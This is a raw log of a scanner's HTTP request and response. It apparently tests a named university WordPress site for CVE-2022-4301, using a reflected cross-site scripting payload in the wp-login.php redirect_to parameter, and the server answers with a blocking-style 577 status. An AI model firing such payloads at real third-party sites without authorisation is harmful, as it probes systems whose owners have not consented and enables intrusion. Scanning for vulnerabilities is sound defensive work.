[CVE-2022-4301] Dumped HTTP request for https://lecao-lab.science.unimelb.edu.au/wp-login.php?action=register&redirect_to=x%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E


GET /wp-login.php?action=register&redirect_to=x%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: lecao-lab.science.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[CVE-2022-4301] Dumped HTTP response https://lecao-lab.science.unimelb.edu.au/wp-login.php?action=register&redirect_to=x%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E

HTTP/1.1 577 
Connection: close
Date: Wed, 06 Aug 2025 15:18:04 GMT
Server: openresty
Content-Length: 0


